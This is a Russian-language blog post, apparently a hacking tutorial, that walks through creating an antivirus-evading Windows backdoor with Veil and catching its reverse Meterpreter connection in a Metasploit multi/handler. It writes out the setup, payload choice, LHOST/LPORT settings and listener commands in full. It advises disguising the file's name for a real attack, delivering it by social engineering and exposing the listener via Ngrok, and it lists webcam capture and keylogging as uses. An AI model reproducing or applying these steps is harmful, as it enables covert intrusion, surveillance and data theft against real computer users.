May 10, 2022

Создаем вирус для Windows

В этой статье продолжим изучать тему малвари и рассмотрим еще один способ создания вируса бэкдор с помощью инструмента Veil на Kali Linux

Привет, друзья!
Работа с различными вредоносными файлами — это область в которой должны обязательно разбираться хакеры. Мы уже много раз рассказывали об инструментах создания вирусов для различных операционных систем. В этой статье продолжим изучать тему малвари и рассмотрим еще один способ создания вируса бэкдор с помощью инструмента Veil на Kali Linux (или любом другом дистрибутиве Linux).


Как создать вирус для Windows с помощью Veil на Kali Linux

Вирус бэкдор (троян, rat) — это вредоносное ПО, цель которого — скрытое подключение, получение информации и манипуляция удаленным компьютером.

Далее покажу, как я создал вирус бэкдор для компьютера с Windows, запуск и работу которого не смог обнаружить даже антивирус. После запуска вируса я смог удаленно управлять компьютером, делать снимки с вебки, скрины, использовать кейлоггер и т. д.

Давайте рассмотрим шаги для создания вируса...


1. Установка Veil на Linux

Первым шагом будет установка Veil. Если вы используете отличный от Kali Linux дистрибутив, тогда нужно также установить Metasploit.

Для быстрой и тихой установки Veil на Kali Linux:

apt -y install veil

/usr/share/veil/config/setup.sh --force --silent


2. Использование фреймворка Veil

После установки для запуска фреймворка, используем команду:

veil

Фреймворк Veil состоит из двух инструментов Evasion и Ordinance, которые можно отобразить командой:

list

Нас интересует Evasion, поэтому вводим:

use 1

2.1 Создание исполняемого файла вируса

В вирусах типа бэкдор создается обратное соединение. Когда целевой пользователь запускает вредоносный файл вируса, компьютер пытается соединиться с компьютером хакера. Этот процесс называется «бэкконнект». Атака идет изнутри, поэтому антивирусы не всегда могут обнаружить подобную атаку. По этой причине лучше использовать порт 8080 — это обычным порт используемый для подключения к сайтам.

Для отображения списка полезных нагрузок (вирусов), используем команду:

list

Я буду использовать 15-й вариант. Эта опция в качестве языка программирования полезной нагрузки Meterpreter использует golang:

use 15

Для создания вируса нужно задать параметры LPORT и LHOST.

  • LPORT — IP-адрес атакующего компьютера. Чтобы узнать свой IP-адрес, используйте команду ifconfig.
  • LHOST — порт для подключения. Я буду использовать 8080, но вы можете выбрать другой порт.

set LHOST ваш_ip

set LPORT 8080

Сигнатурный анализ антивируса основан на поиске в файлах уникальной последовательности байтов — сигнатуры, характерной для определенного вируса. Для каждого нового вируса определяется его сигнатура. Полученные данные помещают в базу данных вирусных сигнатур, с которой работают все антивирусы.

Если сигнатура вашего вредоносного файла присутствует в этой базе, антивирус пометит ваш файл как подозрительный. Поэтому рекомендуется использовать обновленную версию Veil, так как обновленная версия лучше справится с маскировкой вируса и позволит обойти антивирус.

Следующие настройки я использовал для обхода антивируса. Это не обязательная часть, но лишняя защита вредоноса не помешает.

Для создания вируса выполняем команду:

generate

Дайте имя файлу. Я назвал его backdoor_8080, но в реальном взломе, чтобы он не вызывал подозрений, вы должны назвать его иначе.

Созданный вирус будет сохранен в каталоге:

var/lib/veil/output/compiled/

2.2 Подключение к удаленному компьютеру

Теперь запустим фреймворк Metasploit. Чтобы запустить Metasploit, откройте терминал и выполните команду:

msfconsole

Выбираем модуль multi/handler:

use exploit/multi/handler

Отобразим параметры:

show options

Изменим параметры в соответствии с нашими требованиями. Выполним следующие команды:

set PAYLAOD windows/meterpreter/reverse_https

set LHOST IP

set LPORT 8080

show options

IP — это IP-адрес нашего компьютера, который мы использовали во время создания вируса.

Запускаем слушатель:

exploit

2.3 Доставка вируса на целевой компьютер

Теперь можно отправить вирус на целевой компьютер. Если у вас есть нет физического доступа к устройству, тогда можете применить методы социальной инженерии.

2.4 Тестирование вируса на Windows

Запускаем вирус на компьютере Windows (в моем случае — файл backdoor_8080.exe).

Возвращаемся в Metasploit и видим, что открыта сессия metepreter. А значит мы взломали удаленный компьютер и можем с ним взаимодействовать.

Сессия Meterpreter будет выглядеть так, как показано выше. Чтобы получить справку по командам, введите:

help

Теперь можно изменять привилегии пользователя, скачивать и заливать файлы, запускать исполняемый файл как службу, делать снимки экрана, сохранять нажатия клавиш и многое другое.

Данный способ можно использовать в локальной сети. Если вы хотите использовать удаленно, тогда необходимо настроить удаленное соединение с помощью Ngrok.